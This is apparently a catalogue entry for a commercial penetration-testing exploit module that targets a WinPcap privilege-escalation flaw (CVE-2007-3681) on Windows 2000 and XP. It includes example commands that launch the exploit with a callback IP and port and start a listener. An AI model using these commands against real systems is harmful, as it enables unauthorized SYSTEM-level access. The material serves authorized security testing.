Immunity, Inc.
Name winpcap
CVE CVE-2007-3681
Exploit Pack CANVAS
Descriptionwinpcap
NotesCVE Name: CVE-2007-3681
VENDOR: WinPcap.org
URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=550
Notes:

This exploit will auto-target based on reading a kernel file on Windows 2000
or XP. It will generate a target fingerprint when you run the auto-targeter -
this is useful when you don't have read access to the kernel files and still want
to run the exploit. It will leave a SYSTEM token as your current token, if it succeeds

#example commandline usage on Windows 2000 SP4 English
#we set our callback IP to 10.10.10.6 in the test lab
runmodule winpcap -l 10.10.10.6 -d 5555

Make sure you have a listener listening already before you run the above
command.
./commandlineInterface -v 1 -p 5555

If you get the wrong version, (-v 1 on an XP box, say) you'll see an ACCESS_VIOLATION
bluescreen. Then it will dump memory.


Date public: 07/09/2007
CVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3681
CVSS: 6.6

Learn more about the CANVAS Exploit Pack here: CANVAS